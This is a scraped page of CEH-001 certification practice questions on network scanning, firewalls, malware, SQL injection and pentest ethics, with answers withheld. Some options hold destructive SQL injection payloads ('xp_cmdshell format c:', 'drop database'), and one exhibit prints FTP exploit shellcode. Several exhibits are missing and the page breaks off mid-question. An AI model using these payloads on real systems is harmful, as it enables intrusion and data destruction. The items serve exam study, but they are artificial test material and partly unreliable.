New Year Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

CEH-001 Questions and Answers

Question # 6

What do you call a system where users need to remember only one username and password, and be authenticated for multiple services?

A.

Simple Sign-on

B.

Unique Sign-on

C.

Single Sign-on

D.

Digital Certificate

Full Access
Question # 7

What is the tool Firewalk used for?

A.

To test the IDS for proper operation

B.

To test a firewall for proper operation

C.

To determine what rules are in place for a firewall

D.

To test the webserver configuration

E.

Firewalk is a firewall auto configuration tool

Full Access
Question # 8

Melissa is a virus that attacks Microsoft Windows platforms.

To which category does this virus belong?

A.

Polymorphic

B.

Boot Sector infector

C.

System

D.

Macro

Full Access
Question # 9

Exhibit:

You are conducting pen-test against a company’s website using SQL Injection techniques. You enter “anuthing or 1=1-“ in the username filed of an authentication form. This is the output returned from the server.

What is the next step you should do?

A.

Identify the user context of the web application by running_

http://www.example.com/order/include_rsa_asp?pressReleaseID=5

AND

USER_NAME() = ‘dbo’

B.

Identify the database and table name by running:

http://www.example.com/order/include_rsa.asp?pressReleaseID=5

AND

ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE

xtype=’U’), 1))) > 109

C.

Format the C: drive and delete the database by running:

http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND

xp_cmdshell ‘format c: /q /yes ‘; drop database myDB; --

D.

Reboot the web server by running:

http://www.example.com/order/include_rsa.asp?pressReleaseID=5

AND xp_cmdshell ‘iisreset –reboot’; --

Full Access
Question # 10

Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit.

Choose the attack type from the choices given below.

A.

Database Fingerprinting

B.

Database Enumeration

C.

SQL Fingerprinting

D.

SQL Enumeration

Full Access
Question # 11

Exhibit:

TCP TTL:50 TOS:0×0 ID:53476 DF

*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78

TCP Options => NOP NOP TS: 126045057 105803098

50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD …….1.1.1..F.

80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?…k^

31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f…..

27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB ‘..1..^..=..1.1.

8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1…1..^..

0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 …..u.1..F..^..

3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =…..0…F.1..F

07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F….N..V..

0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF …1.1……….

FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 …0bin0sh1..11v

65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka

73 69 65 2E 63 6F 6D 0D 0A sie.com..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882

TCP TTL:63 TOS:0×10 ID:48231 DF

*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78

TCP Options => NOP NOP TS: 105803113 126045057

35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr

65 63 74 2E 0D 0A ect…

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0×10 ID:48233 DF

*****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78

TCP Options => NOP NOP TS: 105803984 126045931

32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at

20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb

79 65 2E 0D 0A ye…

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882

TCP TTL:63 TOS:0×10 ID:48234 DF

***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78

TCP Options => NOP NOP TS: 105803984 126045931

Given the following extract from the snort log on a honeypot, what service is being exploited? :

A.

FTP

B.

SSH

C.

Telnet

D.

SMTP

Full Access
Question # 12

ETHER: Destination address : 0000BA5EBA11 ETHER: Source address :

An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application?

A.

Create a SYN flood

B.

Create a network tunnel

C.

Create multiple false positives

D.

Create a ping flood

Full Access
Question # 13

The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds.

What kind of attack is this program susceptible to?

A.

Buffer of Overflow

B.

Denial of Service

C.

Shatter Attack

D.

Password Attack

Full Access
Question # 14

In an attempt to secure his 802.11b wireless network, Ulf decides to use a strategic antenna positioning. He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building’s center. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack.

Which of the following statements is true?

A.

With the 300 feet limit of a wireless signal, Ulf’s network is safe.

B.

Wireless signals can be detected from miles away, Ulf’s network is not safe.

C.

Ulf’s network will be safe but only of he doesn’t switch to 802.11a.

D.

Ulf’s network will not be safe until he also enables WEP.

Full Access
Question # 15

Joe the Hacker breaks into XYZ’s Linux system and plants a wiretap program in order to sniff passwords and user accounts off the wire. The wiretap program is embedded as a Trojan horse in one of the network utilities. Joe is worried that network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuous mode.

What can Joe do to hide the wiretap program from being detected by ifconfig command?

A.

Block output to the console whenever the user runs ifconfig command by running screen capture utiliyu

B.

Run the wiretap program in stealth mode from being detected by the ifconfig command.

C.

Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information being displayed on the console.

D.

You cannot disable Promiscuous mode detection on Linux systems.

Full Access
Question # 16

You perform the above traceroute and notice that hops 19 and 20 both show the same IP address.

This probably indicates what?

A.

A host based IDS

B.

A Honeypot

C.

A stateful inspection firewall

D.

An application proxying firewall

Full Access
Question # 17

Your boss Tess King is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack?

A.

SQL Input attack

B.

SQL Piggybacking attack

C.

SQL Select attack

D.

SQL Injection attack

Full Access
Question # 18

If an e-commerce site was put into a live environment and the programmers failed to remove the secret entry point that was used during the application development, what is this secret entry point known as?

A.

SDLC process

B.

Honey pot

C.

SQL injection

D.

Trap door

Full Access
Question # 19

Which of the following tools can be used to perform a zone transfer?

A.

NSLookup

B.

Finger

C.

Dig

D.

Sam Spade

E.

Host

F.

Netcat

G.

Neotrace

Full Access
Question # 20

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is just called "file.txt" but when he opens it, he finds the following:

What can he infer from this file?

A.

A picture that has been renamed with a .txt extension

B.

An encrypted file

C.

An encoded file

D.

A buffer overflow

Full Access
Question # 21

Exhibit

(Note: the student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.)

Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal?

What is odd about this attack? Choose the best answer.

A.

This is not a spoofed packet as the IP stack has increasing numbers for the three flags.

B.

This is back orifice activity as the scan comes form port 31337.

C.

The attacker wants to avoid creating a sub-carries connection that is not normally valid.

D.

These packets were crafted by a tool, they were not created by a standard IP stack.

Full Access
Question # 22

Cyber Criminals have long employed the tactic of masking their true identity. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine, by "spoofing" the IP address of that machine.

How would you detect IP spoofing?

A.

Check the IPID of the spoofed packet and compare it with TLC checksum. If the numbers match then it is spoofed packet

B.

Probe a SYN Scan on the claimed host and look for a response SYN/FIN packet, if the connection completes then it is a spoofed packet

C.

Turn on 'Enable Spoofed IP Detection' in Wireshark, you will see a flag tick if the packet is spoofed

D.

Sending a packet to the claimed host will result in a reply. If the TTL in the reply is not the same as the packet being checked then it is a spoofed packet

Full Access
Question # 23

Maintaining a secure Web server requires constant effort, resources, and vigilance from an organization. Securely administering a Web server on a daily basis is an essential aspect of Web server security.

Maintaining the security of a Web server will usually involve the following steps:

1. Configuring, protecting, and analyzing log files

2. Backing up critical information frequently

3. Maintaining a protected authoritative copy of the organization's Web content

4. Establishing and following procedures for recovering from compromise

5. Testing and applying patches in a timely manner

6. Testing security periodically.

In which step would you engage a forensic investigator?

A.

1

B.

2

C.

3

D.

4

E.

5

F.

6

Full Access
Question # 24

Which of the following statement correctly defines ICMP Flood Attack? (Select 2 answers)

A.

Bogus ECHO reply packets are flooded on the network spoofing the IP and MAC address

B.

The ICMP packets signal the victim system to reply and the combination of traffic saturates the bandwidth of the victim's network

C.

ECHO packets are flooded on the network saturating the bandwidth of the subnet causing denial of service

D.

A DDoS ICMP flood attack occurs when the zombies send large volumes of ICMP_ECHO_REPLY packets to the victim system.

Full Access
Question # 25

A common technique for luring e-mail users into opening virus-launching attachments is to send messages that would appear to be relevant or important to many of their potential recipients. One way of accomplishing this feat is to make the virus-carrying messages appear to come from some type of business entity retailing sites, UPS, FEDEX, CITIBANK or a major provider of a common service.

Here is a fraudulent e-mail claiming to be from FedEx regarding a package that could not be delivered. This mail asks the receiver to open an attachment in order to obtain the FEDEX tracking number for picking up the package. The attachment contained in this type of e-mail activates a virus.

Vendors send e-mails like this to their customers advising them not to open any files attached with the mail, as they do not include attachments.

Fraudulent e-mail and legit e-mail that arrives in your inbox contain the fedex.com as the sender of the mail.

How do you ensure if the e-mail is authentic and sent from fedex.com?

A.

Verify the digital signature attached with the mail, the fake mail will not have Digital ID at all

B.

Check the Sender ID against the National Spam Database (NSD)

C.

Fake mail will have spelling/grammatical errors

D.

Fake mail uses extensive images, animation and flash content

Full Access
Question # 26

What is the problem with this ASP script (login.asp)?

A.

The ASP script is vulnerable to Cross Site Scripting attack

B.

The ASP script is vulnerable to Session Splice attack

C.

The ASP script is vulnerable to XSS attack

D.

The ASP script is vulnerable to SQL Injection attack

Full Access
Question # 27

You are the security administrator of Jaco Banking Systems located in Boston. You are setting up e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking customer with a single password, you give them a printed list of 100 unique passwords. Each time the customer needs to log into the e-banking system website, the customer enters the next password on the list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no damage is done because the password will not be accepted a second time. Once the list of 100 passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail to the customer.

You are confident that this security implementation will protect the customer from password abuse.

Two months later, a group of hackers called "HackJihad" found a way to access the one-time password list issued to customers of Jaco Banking Systems. The hackers set up a fake website (http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake website asked users for their e-banking username and password, and the next unused entry from their one-time password sheet. The hackers collected 200 customer 's username/passwords this way. They transferred money from the customer's bank account to various offshore accounts.

Your decision of password policy implementation has cost the bank with USD 925, 000 to hackers. You immediately shut down the e-banking website while figuring out the next best security solution

What effective security solution will you recommend in this case?

A.

Implement Biometrics based password authentication system. Record the customers face image to the authentication database

B.

Configure your firewall to block logon attempts of more than three wrong tries

C.

Enable a complex password policy of 20 characters and ask the user to change the password immediately after they logon and do not store password histories

D.

Implement RSA SecureID based authentication system

Full Access
Question # 28

David is a security administrator working in Boston. David has been asked by the office's manager to block all POP3 traffic at the firewall because he believes employees are spending too much time reading personal email. How can David block POP3 at the firewall?

A.

David can block port 125 at the firewall.

B.

David can block all EHLO requests that originate from inside the office.

C.

David can stop POP3 traffic by blocking all HELO requests that originate from inside the office.

D.

David can block port 110 to block all POP3 traffic.

Full Access
Question # 29

TCP/IP Session Hijacking is carried out in which OSI layer?

A.

Datalink layer

B.

Transport layer

C.

Network layer

D.

Physical layer

Full Access
Question # 30

Attackers footprint target Websites using Google Hacking techniques. Google hacking is a term that refers to the art of creating complex search engine queries. It detects websites that are vulnerable to numerous exploits and vulnerabilities. Google operators are used to locate specific strings of text within the search results.

The configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. WordPress uses config.php that stores the database Username and Password.

Which of the below Google search string brings up sites with "config.php" files?

A.

Search:index config/php

B.

Wordpress:index config.php

C.

intitle:index.of config.php

D.

Config.php:index list

Full Access
Question # 31

In Trojan terminology, what is required to create the executable file chess.exe as shown below?

A.

Mixer

B.

Converter

C.

Wrapper

D.

Zipper

Full Access
Question # 32

You just purchased the latest DELL computer, which comes pre-installed with Windows 7, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it.

A.

New installation of Windows should be patched by installing the latest service packs and hotfixes

B.

Key applications such as Adobe Acrobat, Macromedia Flash, Java, Winzip etc., must have the latest security patches installed

C.

Install a personal firewall and lock down unused ports from connecting to your computer

D.

Install the latest signatures for Antivirus software

E.

Configure "Windows Update" to automatic

F.

Create a non-admin user with a complex password and logon to this account

G.

You can start using your computer as vendors such as DELL, HP and IBM would have already installed the latest service packs.

Full Access
Question # 33

This type of Port Scanning technique splits TCP header into several packets so that the packet filters are not able to detect what the packets intends to do.

A.

UDP Scanning

B.

IP Fragment Scanning

C.

Inverse TCP flag scanning

D.

ACK flag scanning

Full Access
Question # 34

Which of the following tool would be considered as Signature Integrity Verifier (SIV)?

A.

Nmap

B.

SNORT

C.

VirusSCAN

D.

Tripwire

Full Access
Question # 35

What type of Trojan is this?

A.

RAT Trojan

B.

E-Mail Trojan

C.

Defacement Trojan

D.

Destructing Trojan

E.

Denial of Service Trojan

Full Access
Question # 36

Google uses a unique cookie for each browser used by an individual user on a computer. This cookie contains information that allows Google to identify records about that user on its database. This cookie is submitted every time a user launches a Google search, visits a site using AdSense etc. The information stored in Google's database, identified by the cookie, includes

  • Everything you search for using Google
  • Every web page you visit that has Google Adsense ads

How would you prevent Google from storing your search keywords?

A.

Block Google Cookie by applying Privacy and Security settings in your web browser

B.

Disable the Google cookie using Google Advanced Search settings on Google Search page

C.

Do not use Google but use another search engine Bing which will not collect and store your search keywords

D.

Use MAC OS X instead of Windows 7. Mac OS has higher level of privacy controls by default.

Full Access
Question # 37

Syslog is a standard for logging program messages. It allows separation of the software that generates messages from the system that stores them and the software that reports and analyzes them. It also provides devices, which would otherwise be unable to communicate a means to notify administrators of problems or performance.

What default port Syslog daemon listens on?

A.

242

B.

312

C.

416

D.

514

Full Access
Question # 38

Samuel is the network administrator of DataX Communications, Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours' time after more than three unsuccessful attempts. He is confident that this rule will secure his network from hackers on the Internet.

But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall rule.

Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be prepared to accept from a particular IP address. This action will slow the intruder's attempts.

Samuel wants to completely block hackers brute force attempts on his network.

What are the alternatives to defending against possible brute-force password attacks on his site?

A.

Enforce a password policy and use account lockouts after three wrong logon attempts even though this might lock out legit users

B.

Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the

Firewall manually

C.

Enforce complex password policy on your network so that passwords are more difficult to brute force

D.

You cannot completely block the intruders attempt if they constantly switch proxies

Full Access
Question # 39

To what does “message repudiation” refer to what concept in the realm of email security?

A.

Message repudiation means a user can validate which mail server or servers a message was passed through.

B.

Message repudiation means a user can claim damages for a mail message that damaged their reputation.

C.

Message repudiation means a recipient can be sure that a message was sent from a particular person.

D.

Message repudiation means a recipient can be sure that a message was sent from a certain host.

E.

Message repudiation means a sender can claim they did not actually send a particular message.

Full Access
Question # 40

What ICMP message types are used by the ping command?

A.

Timestamp request (13) and timestamp reply (14)

B.

Echo request (8) and Echo reply (0)

C.

Echo request (0) and Echo reply (1)

D.

Ping request (1) and Ping reply (2)

Full Access
Question # 41

MX record priority increases as the number increases. (True/False.

A.

True

B.

False

Full Access
Question # 42

Which of the following activities will NOT be considered as passive footprinting?

A.

Go through the rubbish to find out any information that might have been discarded.

B.

Search on financial site such as Yahoo Financial to identify assets.

C.

Scan the range of IP address found in the target DNS database.

D.

Perform multiples queries using a search engine.

Full Access
Question # 43

While performing ping scans into a target network you get a frantic call from the organization’s security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization’s IDS monitor. How can you modify your scan to prevent triggering this event in the IDS?

A.

Scan more slowly.

B.

Do not scan the broadcast IP.

C.

Spoof the source IP address.

D.

Only scan the Windows systems.

Full Access
Question # 44

Sandra has been actively scanning the client network on which she is doing a vulnerability assessment test. While conducting a port scan she notices open ports in the range of 135 to 139. What protocol is most likely to be listening on those ports?

A.

Finger

B.

FTP

C.

Samba

D.

SMB

Full Access
Question # 45

A distributed port scan operates by:

A.

Blocking access to the scanning clients by the targeted host

B.

Using denial-of-service software against a range of TCP ports

C.

Blocking access to the targeted host by each of the distributed scanning clients

D.

Having multiple computers each scan a small number of ports, then correlating the results

Full Access
Question # 46

What flags are set in a X-MAS scan?(Choose all that apply.

A.

SYN

B.

ACK

C.

FIN

D.

PSH

E.

RST

F.

URG

Full Access
Question # 47

Study the log below and identify the scan type.

A.

nmap -sR 192.168.1.10

B.

nmap -sS 192.168.1.10

C.

nmap -sV 192.168.1.10

D.

nmap -sO -T 192.168.1.10

Full Access
Question # 48

What port scanning method involves sending spoofed packets to a target system and then looking for adjustments to the IPID on a zombie system?

A.

Blind Port Scanning

B.

Idle Scanning

C.

Bounce Scanning

D.

Stealth Scanning

E.

UDP Scanning

Full Access
Question # 49

What is the following command used for?

net use \targetipc$ "" /u:""

A.

Grabbing the etc/passwd file

B.

Grabbing the SAM

C.

Connecting to a Linux computer through Samba.

D.

This command is used to connect as a null session

E.

Enumeration of Cisco routers

Full Access
Question # 50

You are manually conducting Idle Scanning using Hping2. During your scanning you notice that almost every query increments the IPID regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Why do you think this occurs?

A.

The zombie you are using is not truly idle.

B.

A stateful inspection firewall is resetting your queries.

C.

Hping2 cannot be used for idle scanning.

D.

These ports are actually open on the target system.

Full Access
Question # 51

User which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?

A.

18 U.S.C 1029 Possession of Access Devices

B.

18 U.S.C 1030 Fraud and related activity in connection with computers

C.

18 U.S.C 1343 Fraud by wire, radio or television

D.

18 U.S.C 1361 Injury to Government Property

E.

18 U.S.C 1362 Government communication systems

F.

18 U.S.C 1831 Economic Espionage Act

G.

18 U.S.C 1832 Trade Secrets Act

Full Access
Question # 52

Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal?

05/20-17:0645.061034 192.160.13.4:31337 --> 172.16.1.101:1

TCP TTL:44 TOS:0x10 ID:242

***FRP** Seq:0xA1D95  Ack:0x53  Win: 0x400

What is odd about this attack? (Choose the most appropriate statement)

A.

This is not a spoofed packet as the IP stack has increasing numbers for the three flags.

B.

This is back orifice activity as the scan comes from port 31337.

C.

The attacker wants to avoid creating a sub-carrier connection that is not normally valid.

D.

There packets were created by a tool; they were not created by a standard IP stack.

Full Access
Question # 53

Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?

A.

They are written in Java.

B.

They send alerts to security monitors.

C.

They use the same packet analysis engine.

D.

They use the same packet capture utility.

Full Access
Question # 54

An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk assessments. A friend recently started a company and asks the hacker to perform a penetration test and vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting work on this job?

A.

Start by foot printing the network and mapping out a plan of attack.

B.

Ask the employer for authorization to perform the work outside the company.

C.

Begin the reconnaissance phase with passive information gathering and then move into active information gathering.

D.

Use social engineering techniques on the friend's employees to help identify areas that may be susceptible to attack.

Full Access
Question # 55

Which of the following is used to indicate a single-line comment in structured query language (SQL)?

A.

--

B.

||

C.

%%

D.

''

Full Access
Question # 56

Which statement best describes a server type under an N-tier architecture?

A.

A group of servers at a specific layer

B.

A single server with a specific role

C.

A group of servers with a unique role

D.

A single server at a specific layer

Full Access
Question # 57

A hacker is attempting to see which IP addresses are currently active on a network. Which NMAP switch would the hacker use?

A.

-sO

B.

-sP

C.

-sS

D.

-sU

Full Access
Question # 58

Which property ensures that a hash function will not produce the same hashed value for two different messages?

A.

Collision resistance

B.

Bit length

C.

Key strength

D.

Entropy

Full Access
Question # 59

Which of the following descriptions is true about a static NAT?

A.

A static NAT uses a many-to-many mapping.

B.

A static NAT uses a one-to-many mapping.

C.

A static NAT uses a many-to-one mapping.

D.

A static NAT uses a one-to-one mapping.

Full Access
Question # 60

WPA2 uses AES for wireless data encryption at which of the following encryption levels?

A.

64 bit and CCMP

B.

128 bit and CRC

C.

128 bit and CCMP

D.

128 bit and TKIP

Full Access
Question # 61

A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company’s internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur?

A.

SSL

B.

Mutual authentication

C.

IPSec

D.

Static IP addresses

Full Access
Question # 62

Which of the following can the administrator do to verify that a tape backup can be recovered in its entirety?

A.

Restore a random file.

B.

Perform a full restore.

C.

Read the first 512 bytes of the tape.

D.

Read the last 512 bytes of the tape.

Full Access
Question # 63

Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must have in order to properly function?

A.

Fast processor to help with network traffic analysis

B.

They must be dual-homed

C.

Similar RAM requirements

D.

Fast network interface cards

Full Access
Question # 64

A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester pivot using Metasploit?

A.

Issue the pivot exploit and set the meterpreter.

B.

Reconfigure the network settings in the meterpreter.

C.

Set the payload to propagate through the meterpreter.

D.

Create a route statement in the meterpreter.

Full Access
Question # 65

Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results? TCP port 21 – no response TCP port 22 – no response TCP port 23 – Time-to-live exceeded

A.

The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.

B.

The lack of response from ports 21 and 22 indicate that those services are not running on the destination server.

C.

The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall.

D.

The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error.

Full Access
Question # 66

Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will decode a packet capture and extract the voice conversations?

A.

Cain

B.

John the Ripper

C.

Nikto

D.

Hping

Full Access
Question # 67

A penetration tester is hired to do a risk assessment of a company's DMZ. The rules of engagement states that the penetration test be done from an external IP address with no prior knowledge of the internal IT systems. What kind of test is being performed?

A.

white box

B.

grey box

C.

red box

D.

black box

Full Access
Question # 68

Which of the following are variants of mandatory access control mechanisms? (Choose two.)

A.

Two factor authentication

B.

Acceptable use policy

C.

Username / password

D.

User education program

E.

Sign in register

Full Access
Question # 69

Which results will be returned with the following Google search query?

site:target.com -site:Marketing.target.com accounting

A.

Results matching all words in the query

B.

Results matching “accounting” in domain target.com but not on the site Marketing.target.com

C.

Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting

D.

Results for matches on target.com and Marketing.target.com that include the word “accounting”

Full Access
Question # 70

Which tool can be used to silently copy files from USB devices?

A.

USB Grabber

B.

USB Dumper

C.

USB Sniffer

D.

USB Snoopy

Full Access
Question # 71

When creating a security program, which approach would be used if senior management is supporting and enforcing the security policy?

A.

A bottom-up approach

B.

A top-down approach

C.

A senior creation approach

D.

An IT assurance approach

Full Access
Question # 72

When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open Source Security Testing Methodology Manual (OSSTMM) the main difference is

A.

OWASP is for web applications and OSSTMM does not include web applications.

B.

OSSTMM is gray box testing and OWASP is black box testing.

C.

OWASP addresses controls and OSSTMM does not.

D.

OSSTMM addresses controls and OWASP does not.

Full Access
Question # 73

Which command lets a tester enumerate alive systems in a class C network via ICMP using native Windows tools?

A.

ping 192.168.2.

B.

ping 192.168.2.255

C.

for %V in (1 1 255) do PING 192.168.2.%V

D.

for /L %V in (1 1 254) do PING -n 1 192.168.2.%V | FIND /I "Reply"

Full Access
Question # 74

Which of the following problems can be solved by using Wireshark?

A.

Tracking version changes of source code

B.

Checking creation dates on all webpages on a server

C.

Resetting the administrator password on multiple systems

D.

Troubleshooting communication resets between two systems

Full Access
Question # 75

Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection?

A.

NMAP -PN -A -O -sS 192.168.2.0/24

B.

NMAP -P0 -A -O -p1-65535 192.168.0/24

C.

NMAP -P0 -A -sT -p0-65535 192.168.0/16

D.

NMAP -PN -O -sS -p 1-1024 192.168.0/8

Full Access
Question # 76

Which of the following programs is usually targeted at Microsoft Office products?

A.

Polymorphic virus

B.

Multipart virus

C.

Macro virus

D.

Stealth virus

Full Access
Question # 77

Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the following choices would be a common vulnerability that usually exposes them?

A.

Cross-site scripting

B.

SQL injection

C.

Missing patches

D.

CRLF injection

Full Access
Question # 78

A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much information can be obtained from the firm's public facing web servers. The engineer decides to start by using netcat to port 80.

The engineer receives this output:

HTTP/1.1 200 OK

Server: Microsoft-IIS/6

Expires: Tue, 17 Jan 2011 01:41:33 GMT

DatE. Mon, 16 Jan 2011 01:41:33 GMT

Content-TypE. text/html

Accept-Ranges: bytes

Last-ModifieD. Wed, 28 Dec 2010 15:32:21 GMT

ETaG. "b0aac0542e25c31:89d"

Content-Length: 7369

Which of the following is an example of what the engineer performed?

A.

Cross-site scripting

B.

Banner grabbing

C.

SQL injection

D.

Whois database query

Full Access
Question # 79

Employees in a company are no longer able to access Internet web sites on their computers. The network administrator is able to successfully ping IP address of web servers on the Internet and is able to open web sites by using an IP address in place of the URL. The administrator runs the nslookup command for www.eccouncil.org and receives an error message stating there is no response from the server. What should the administrator do next?

A.

Configure the firewall to allow traffic on TCP ports 53 and UDP port 53.

B.

Configure the firewall to allow traffic on TCP ports 80 and UDP port 443.

C.

Configure the firewall to allow traffic on TCP port 53.

D.

Configure the firewall to allow traffic on TCP port 8080.

Full Access
Question # 80

Which command line switch would be used in NMAP to perform operating system detection?

A.

-OS

B.

-sO

C.

-sP

D.

-O

Full Access
Question # 81

Which of the following settings enables Nessus to detect when it is sending too many packets and the network pipe is approaching capacity?

A.

Netstat WMI Scan

B.

Silent Dependencies

C.

Consider unscanned ports as closed

D.

Reduce parallel connections on congestion

Full Access
Question # 82

What is the correct PCAP filter to capture all TCP traffic going to or from host 192.168.0.125 on port 25?

A.

tcp.src == 25 and ip.host == 192.168.0.125

B.

host 192.168.0.125:25

C.

port 25 and host 192.168.0.125

D.

tcp.port == 25 and ip.host == 192.168.0.125

Full Access
Question # 83

While conducting a penetration test, the tester determines that there is a firewall between the tester's machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the session layer of the OSI model. Which type of firewall is the tester trying to traverse?

A.

Packet filtering firewall

B.

Application-level firewall

C.

Circuit-level gateway firewall

D.

Stateful multilayer inspection firewall

Full Access
Question # 84

A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that were confusing in concluding the Operating System (OS) version installed. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS?

Starting NMAP 5.21 at 2011-03-15 11:06

NMAP scan report for 172.16.40.65

Host is up (1.00s latency).

Not shown: 993 closed ports

PORT STATE SERVICE

21/tcp open ftp

23/tcp open telnet

80/tcp open http

139/tcp open netbios-ssn

515/tcp open

631/tcp open ipp

9100/tcp open

MAC Address: 00:00:48:0D:EE:89

A.

The host is likely a Windows machine.

B.

The host is likely a Linux machine.

C.

The host is likely a router.

D.

The host is likely a printer.

Full Access
Question # 85

A consultant has been hired by the V.P. of a large financial organization to assess the company's security posture. During the security testing, the consultant comes across child pornography on the V.P.'s computer. What is the consultant's obligation to the financial organization?

A.

Say nothing and continue with the security testing.

B.

